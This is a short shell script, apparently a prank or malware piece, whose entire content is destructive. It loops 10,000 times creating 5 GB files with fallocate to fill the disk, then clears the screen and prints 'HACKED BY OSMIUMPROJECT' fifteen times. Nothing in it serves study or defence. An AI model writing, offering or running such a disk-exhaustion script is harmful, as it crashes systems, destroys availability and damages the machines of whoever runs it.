#!/bin/sh

random_number=$((RANDOM % 100))

for ((i=1; i<=10000; i++)); do
    fallocate -l 5G "5GB_file_$i"
done

clear
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
echo HACKED BY OSMIUMPROJECT
